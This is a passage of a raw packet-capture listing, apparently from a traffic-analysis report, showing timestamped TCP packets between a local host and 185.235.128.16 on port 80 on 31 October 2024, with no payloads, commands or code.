                                                                                                                                            Oct 31, 2024 17:12:04.854604959 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.854777098 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.854789019 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.854799986 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.854820967 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.854856968 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.855123043 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.855133057 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.855144978 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.855159044 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.855189085 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.855427027 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.855437994 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.855448008 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.855463028 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.855490923 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.855865955 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.855876923 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.855887890 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.855897903 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.855899096 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.855911970 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.855922937 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.855933905 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.855961084 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.856683016 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.856693983 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.856704950 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.856714964 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.856718063 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.856746912 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.857232094 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.857242107 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.857253075 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.857263088 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.857264996 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.857295990 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.857770920 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.857781887 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.857793093 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.857801914 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.857803106 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.857815027 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.857832909 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.857861042 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.858381033 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.858413935 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.973150969 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.973222017 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.973225117 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.973258018 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.973262072 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.973297119 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.973309040 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.973347902 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.973357916 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.973398924 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.973608017 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.973642111 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.973651886 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.973676920 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.973680973 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.973712921 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.973735094 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.973752022 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.974010944 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.974044085 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.974121094 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.974229097 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.974261045 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.974262953 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.974277020 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.974351883 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.974566936 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.974601030 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.974612951 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.974680901 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.974690914 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.974723101 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.974951029 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.974982977 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.974993944 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.975017071 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.975024939 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.975052118 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.975066900 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.975086927 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.975094080 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.975121975 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.975150108 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.975163937 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.975821972 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.975851059 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.975862026 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.975883961 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.975887060 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.975917101 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.975928068 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.975949049 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.975953102 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.975985050 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.975994110 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.976020098 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.976027012 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.976059914 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.976661921 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.976695061 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.976701975 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.976728916 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.976737022 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.976763964 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.976769924 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.976797104 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.976803064 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.976830006 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.976835966 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.976866007 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:04.976870060 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:04.976905107 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.092327118 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.092370033 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.092381954 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.092434883 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.092475891 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.092670918 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.092683077 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.092695951 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.092713118 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.092734098 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.093071938 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.093082905 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.093094110 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.093106031 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.093123913 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.093127966 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.093133926 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.093157053 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.093168020 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.093769073 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.093780994 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.093791962 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.093802929 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.093812943 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.093816996 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.093842030 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.093858957 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.094397068 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.094408989 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.094420910 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.094433069 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.094438076 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.094444990 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.094455957 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.094475985 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.095033884 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.095046043 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.095056057 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.095068932 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.095078945 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.095079899 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.095092058 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.095097065 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.095114946 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.095136881 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.096002102 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.096013069 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.096024036 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.096035004 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.096045017 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.096045971 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.096055984 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.096065998 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.096069098 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.096092939 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.096117973 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.096755981 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.096774101 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.096798897 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.096817017 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.210544109 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.210617065 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.210618973 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.210628033 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.210661888 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.210843086 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.210855961 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.210891962 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.211070061 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.211113930 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.211119890 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.211150885 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.211292028 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.211302042 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.211319923 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.211338997 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.211364031 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.211597919 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.211616039 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.211639881 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.211663008 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.211829901 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.211848021 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.211859941 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.211870909 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.211872101 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.211883068 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.211890936 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.211910009 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.211937904 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.212471008 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.212482929 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.212493896 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.212506056 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.212518930 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.212551117 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.212999105 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.213011026 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.213047028 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.213311911 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.213320971 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.213331938 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.213344097 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.213355064 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.213361025 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.213365078 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.213376999 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.213380098 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.213402987 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.213423967 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.214220047 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.214231968 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.214242935 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.214255095 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.214265108 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.214279890 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.214310884 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.214874983 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.214885950 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.214896917 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.214922905 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.214939117 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.215190887 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.215203047 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.215213060 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.215245008 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.215270042 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.329313993 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.329339027 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.329348087 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.329441071 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.329464912 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.329507113 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.329572916 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.329583883 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.329611063 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.329627991 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.329790115 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.329802990 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.329827070 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.329849005 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.330018044 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.330056906 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.330121994 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.330133915 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.330143929 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.330166101 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.330203056 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.330455065 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.330466986 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.330477953 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.330491066 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.330499887 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.330522060 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.330543995 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.330912113 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.330926895 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.330936909 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.330950022 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.330959082 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.330961943 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.330977917 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.331002951 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.331512928 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.331530094 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.331547022 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.331559896 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.331561089 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.331572056 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.331598043 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.331613064 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.332061052 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.332072020 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.332083941 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.332096100 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.332109928 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.332113028 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.332124949 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.332140923 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.332171917 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.332722902 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.332735062 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.332746983 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.332760096 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.332767963 CET4973080192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:05.332771063 CET8049730185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:05.332783937 CET8049730185.235.128.16192.168.2.4
